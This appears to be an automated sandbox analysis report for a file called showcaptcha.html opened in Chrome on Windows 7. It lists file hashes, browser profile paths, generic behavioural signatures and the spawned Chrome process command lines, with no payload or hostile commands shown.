| SHA1 | 77d8b870a7dc0eb50bae850708eb88291f3b9603 |
| SHA256 | f2e70393d1b47b778244aef5a5c87f285c7189c858afb5a50b851e75a16e53b6 |
| SHA512 | c746ca6a1116c8e8f2d4845ddf464b39dfeeb3e8f63252365cb8fa080e2da4349d0f0973c515abe24f3cb08c68deb5dbcd71f0d6cdfbbdd512b0b4d60762dc51 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31978
| MD5 | bb7d7ee847909e020cecf30f87ef8643 |
| SHA1 | b4eedf6dec8c893e74974dbeef0b206612e2b4de |
| SHA256 | 561f6fb033c13f61db485d3f8d0976f7d3328d7b0c91d371ee77696dfb1c395d |
| SHA512 | d08d75b11ecbd40eb6b70e3ae75864b745add0de65c3f748601e8095a6a867fd19f57bd68b50b06fcc9bc065c696cbe54610927ebf2c2121716a958c795d01df |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 4e08902eb7a03df29c991f41580d0c4e |
| SHA1 | db89428b5cb5737ac44ea60918db6f2a8e52758c |
| SHA256 | 38b06c8db8d7db5d0b58a8c55aaeb5edfe99e8f4318686241bb9207bc6db1092 |
| SHA512 | da4d105781dc827cc32a134c9afcdce224f3d87820518ee16d17afc00f132b832f2f1dd839be9799f9c1b6b18a6171fd82a7e95687da70c8cdec868a7e6d3abb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c0f011cc48a13a585445a342dcc1fc6d |
| SHA1 | 0ffc3ae3fa177ab2477210e2b1504faa26231f8f |
| SHA256 | d31349788fc6c81c50ef5e4cc1130466ac12f7544bbb915922cc8cca7dc764c2 |
| SHA512 | e5615f4260ce364a714700b97686c8618d43a51a2c9d74d19a4813599c952d7b5ac0b8df6d8f9b3048b80226215d6d078f535ee6418baf11d988ba23adc7f236 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 6a0847fbd3c6f886644cc30f35bc2e1d |
| SHA1 | c581e8d434d5edff7cdfae0e68c136cd2bae693c |
| SHA256 | 52ecee141745dd32ec15982beb5f06ff6d9e1c9113cf6f8e42fc8ce7c06e1cb0 |
| SHA512 | 5c66e3de60411d7b652fd471ff1b284705e63f3a616e185bbd38fb0eb5cc4c3ac7bb59f2b03fa30d07d348038058f9225b926644becaf172dd4b164831931ac3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | c30bcf14311c15925a7a04f38134b726 |
| SHA1 | 701160320fefcf846586ed75ba7180838ebd1f97 |
| SHA256 | e53d8fdb314981d46d36244bc0e9829d9087e5b34c3c2770904bad7fba038845 |
| SHA512 | 06db6579a92286f9c567f324179ef7ab3b9f6463193333343c53e71167dcdcb893e22a1c049e4497174e7641d256ff98e631501c493e3f30187c57eafd6e9b1c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\thumbnails\c9e626258b56c126eeb9839a3833c741.png
| MD5 | 7e2ed7c370e594e7a35c7f6edf80e78d |
| SHA1 | 04d74e7345d2a1265f793b5e3f944b3c0cfdd24c |
| SHA256 | f93afdc5aa9082bdf396147822f9cd9eb715e525393ffc757fe6ae7973a16c7e |
| SHA512 | 16101e908b5afa434bef39a2448bdac602e3d8103ba846493e17a9890ccefec967e18a5651f4e99bc373d2a891525dd0ae6fadcf2314cecac1bdc6f2cc520659 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 358268b7f8511b189e18e30d0ff63b7b |
| SHA1 | a5861623cd77efa1d561c579f3ffbf744211890b |
| SHA256 | 6d5b738764e28efb285e4df96a02591c3479bfc49f3555ca30b6d2f0d93c1b29 |
| SHA512 | 31e6377d57d58c22b593dd3fedb922d068fa012b6ca042b710419b9f785806b794f028ba50268d6e7e69a8efbaca8ea26f7f7e3261b7489dcc076f42a831e4fb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
| MD5 | 6e55306ef62e3e1c2e519dcdab7448c3 |
| SHA1 | ba16b7c06f0e4c93dcd0a1c0d0e224897830a58d |
| SHA256 | f62575aec304f87e79de4e09a644d2d1223b068076d21068f0632dbec9409c24 |
| SHA512 | 55859c0107d1e0ac3c048e1b498cff4f37d5ede6fa1069edf953d32c9d7fecb87e573e8c24b4c32a1c0ad65c09f34acb60861df009a71bff365e4c4d7cc9d9a1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 3e3643993c312a3ce98036d245bb1a59 |
| SHA1 | de2f98cf3b05ef9b8fd1ee9cfd94898919d761cf |
| SHA256 | 4ffb1ec18a1f73738ea7f783dcbb571911f5ac4200eebc325d10244df592964a |
| SHA512 | dfa98e56a9665d42b27c7cd9c2b575a33ab97c964c2a4af58811858cb9c4d192751d1df31d3c5cd1d4b7eb5d0fa430036427273812ca96f8cd17795567df2ad6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 9bb9fbb3d6da9aa950dd01a1d54ac6ec |
| SHA1 | 9d5242693d5515221c78a5f039646f5508137229 |
| SHA256 | 77ff439cc82701e2ba94e7ae160cbbcd4e7d7d4b3976266b9ee6327aea831a04 |
| SHA512 | 8c7da8c7556f1e995a4c7bdda323a56781a64ba3df5d3bb20dded2148faba2622f6a33be4c45356f5e7e351230285ad5f5bd8fab019919a903b291240b94747c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\broadcast-listeners.json
| MD5 | 72c95709e1a3b27919e13d28bbe8e8a2 |
| SHA1 | 00892decbee63d627057730bfc0c6a4f13099ee4 |
| SHA256 | 9cf589357fceea2f37cd1a925e5d33fd517a44d22a16c357f7fb5d4d187034aa |
| SHA512 | 613ca9dd2d12afe31fb2c4a8d9337eeecfb58dabaeaaba11404b9a736a4073dfd9b473ba27c1183d3cc91d5a9233a83dce5a135a81f755d978cea9e198209182 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\targeting.snapshot.json
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionCheckpoints.json
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\SiteSecurityServiceState.txt
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\places.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\favicons.sqlite-wal
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\places.sqlite-wal
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13363112889269287
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13363112885839287
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History-journal
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\CURRENT
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe643346.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe64470c.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rlw20jp3.d1m.ps1
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 15:47
Reported
2024-06-17 16:17
Platform
win7-20240508-en
Max time kernel
128s
Max time network
1798s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\showcaptcha.html
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7079758,0x7fef7079768,0x7fef7079778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2128 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 --field-trial-handle=1208,i,10595344890899382990,3380368425966856740,131072 /prefetch:8
Network
Files
\??\pipe\crashpad_2184_BYSQZHVCJTOPWUVD
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences